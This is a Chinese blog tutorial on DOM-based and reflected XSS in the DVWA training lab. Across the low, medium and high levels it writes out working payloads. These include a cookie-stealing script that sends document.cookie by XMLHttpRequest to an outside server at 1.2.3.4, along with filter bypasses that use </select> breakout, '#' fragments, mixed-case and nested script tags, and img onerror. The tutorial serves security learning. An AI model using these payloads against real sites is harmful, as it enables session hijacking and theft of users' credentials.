首页 > 其他分享 >DVWA系列4:XSS 跨站脚本攻击之 DOM型 和 反射型

DVWA系列4:XSS 跨站脚本攻击之 DOM型 和 反射型

时间:2023-03-06 09:24:12浏览次数:67  
标签:XSS 跨站 DOM 标签 alert xhr 地址栏

DVWA系列4:XSS 跨站脚本攻击之 DOM型 和 反射型

前言

跨站脚本攻击(即 Corss Site Script,为了不与 CSS 混淆被称为 XSS)是一种较为常见的攻击手段。主要分为三种类型:DOM 型反射型存储型。本文先主要介绍 DOM 型 和 反射型。

这两种都是完全发生在浏览器中,利用了的是:网站使用URL中的参数渲染网页,但未仔细校验的漏洞。攻击的手段一般都是诱骗用户点击构造的链接,进而将用户的敏感信息发送到攻击者的服务器上。但是这种攻击的缺点也很明显,就是可以根据攻击者留下的服务器地址溯源。

闲言少叙,接下来就开始我们的探索吧。

1. DOM 型

(1)目标网站环境

开始我们可以看到一个“人畜无害”的下拉选择框。选择以后,发现地址栏的参数添加了一个 ?default=English,而且下拉框变成了这个样子:

我们选择的 English 按钮被单独放置了出来。由此猜测地址栏的参数就是被单独放置的参数。直接篡改地址栏的参数(如改成 ?default=battor),回车后发现居然也显示在了下拉选择框中。。。此时我们就可以得出一个结论:网页是根据地址栏的参数渲染的,而且存在漏洞(因为我们随便输入了一个什么参数也展示了)。

(2)Low 难度实操

最直接的当然是使用 script 标签啦,将地址栏的参数改为:

?default=<script>alert(document.cookie)</script>

回车:

可以看到居然弹出了我们的 cookie——这个用来标记我们身份的重要数据。

TIPS

我一开始很不理解,为什么看这类文章大家都用 alert,不过是一个弹窗,能有什么危害。后来了解了,alert 就是一个示意而已,真正的攻击都是在背后悄无声息进行的,这个 alert 就会变成发送到黑客的服务器的函数。在这里也给出一个实际的示例(利用的是 JavaScript 中的立即执行函数写法):

(function(){ const xhr = new XMLHttpRequest(); xhr.open('GET', 'http://服务器地址?参数' + document.cookie); xhr.send() })()

在本例中,将参数改为:

?default=<script>(function(){ const xhr = new XMLHttpRequest(); xhr.open('GET', 'http://1.2.3.4?param=' + document.cookie); xhr.send() })()</script>

可以看到网页中并没有什么变化,但是服务器(这里使用的是 .NET 6 开发的的后端)已经收到浏览器发来的敏感数据了:

(3)Medium 难度实操

查看源代码,可以已经发现对 script 标签进行了处理:

再使用 script 标签就不行了。此时可以想到使用 img 标签的 one rror 来发送。这里也考虑过使用 window.open,但这个是直接的弹窗,一般会被浏览器阻止;使用 img 标签的src,但不能拼接 document.cookie 变量,只能是常量值。

payload 如下:

<img src="1" one rror="(function(){ const xhr = new XMLHttpRequest(); xhr.open('GET', 'http://1.2.3.4?param=' + document.cookie); xhr.send() })()" />

但是此时并不能达到效果。这实际是网站的 DOM 特点决定的,不能直接添加 img 标签。此时我们可以使用 </select> 标签闭合 select 的下拉选择框,再展示图片。

payload 如下:

</select><img src="1" one rror="(function(){ const xhr = new XMLHttpRequest(); xhr.open('GET', 'http://1.2.3.4?param=' + document.cookie); xhr.send() })()" />

此时查看服务器,可以发现收到了浏览器发来的 cookie。

(4)High 难度实操

查看源代码发现,在 服务器端 对参数进行了处理,用了 switch case 排除了给定选项以外的其它选项。

此时我们可以通过 # 号 绕过后端的处理(有点 SQL 注入内味了XD)。# 号其实有锚点的意思,用于浏览器定位页面位置。在 ?default=English 后添加:

#<script>(function(){ const xhr = new XMLHttpRequest(); xhr.open('GET', 'http://1.2.3.4?param=' + document.cookie); xhr.send() })()</script>

刷新页面后,可以在服务器上看到浏览器发来的数据。

2. 反射型

其实有了 DOM 型的经验,反射型理解起来就容易许多。

(1)目标网站环境

依然是一个“人畜无害”的输入框,输入文字后展示在下面,并且地址栏中多了一个参数 ?name=张三

(2)Low 难度实操

直接地址栏上输入 script 标签即可:

?name=<script>alert(123)</script>

(发送请求要写的太长了,这里还是用 alert 来替代吧,害)

(3)Meium 难度实操

查看源代码,可以看到使用了简单的 replace 方式:

那我们构造个异形的 script 不就好了?(生异形吗你们哥几个,哥俩 #滑稽)

直接地址栏上输入 script 标签即可:

?name=<sCript>alert(123)</scRipt>

也可以利用这个 replace 的处理,构造一个存在冗余的 script 标签:

?name=<scr<script>ipt>alert(123)</sc</script>ript>

(3)High 难度实操

通过查看源代码发现,已经对 script 标签进行了严格的过滤:

Medium 难度的 payload 都不再起作用了。这时我们又想到了可以利用 img 标签的 one rror:

?name=<img src="1" one rror="alert(123)">

总结

之前也看过很多文章,感觉一直半懂不懂的。尤其是经常看到上来就是各种 alert 的操作确实有点懵。经过学习别人的文章和自己的实践,终于了解了一些,感觉也不是这么遥不可测。下次继续探索存储型的 XSS 了。

参考

DVWA之XSS (完整版)
Javascript 中发出 HTTP 请求
DVWA-XSS
Web安全实战系列笔记 | XSS跨站实战和分析(五)
xss之DOM型
3-4Dom形XSS详解以及演示
关于DOM型XSS的深入解析(收藏)
DVWA-XSS
渗透测试 | Dvwa XSS超详细通关题解
url中#(hash)的含义
关于一次XSS攻击的onerror事件
DVWA XSS跨站脚本攻击实践

标签:XSS,跨站,DOM,标签,alert,xhr,地址栏
From: https://www.cnblogs.com/battor/p/dvwa_xss_dom_reflection.html

相关文章

  • JavaScript dom查询的其他的方法
    <!DOCTYPEhtml><html> <head> <metacharset="UTF-8"> <title></title> <scripttype="text/javascript"> window.onload=function(){ //获取b......
  • JavaScript dom增删改
    <!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html> <head> <metahttp-equiv="Content-Type"content="text/html;......
  • JavaScript dom查询2
    <!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html> <head> <metahttp-equiv="Content-Type"content="text/html;......
  • DVWA 之 XSS(Stored) - 存储型XSS
    XSS(Stored)-存储型XSS原理存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方。如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该......
  • DVWA 之 XSS(Reflected) - 反射型XSS
    九、XSS(Reflected)-反射型XSS原理XSS,全称CrossSiteScripting,即跨站脚本攻击,某种意义上也是一种注入攻击,指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,......
  • DVWA 之 CSRF-跨站请求伪造
    三、CSRF-跨站请求伪造原理指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身......
  • PentestLab-web安全XSS注入-EXP5
    我们打开靶机选择“Example5”观察使用工具测试选择get方法输入url使用默认字典存在xss漏洞且payload为</script>"><script>prompt(1)</script>验证我们打开靶机观察源代码......
  • JavaScript dom查询
    <!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html> <head> <metahttp-equiv="Content-Type"content="text/html;......
  • JavaScript Dom
    <!DOCTYPEhtml><html> <head> <metacharset="UTF-8"> <title></title> </head> <body> <buttonid="btn">我是一个按钮</button> <scripttype="text/javasc......
  • CF1773D Dominoes - 网络流 - 二分图 - 计数 -
    题目链接:https://codeforces.com/problemset/problem/1773/D题解:首先将棋盘黑白染色,是一个二分图由于题目保证初始状态一定能密铺,因此这个二分图一定有完美匹配现在要......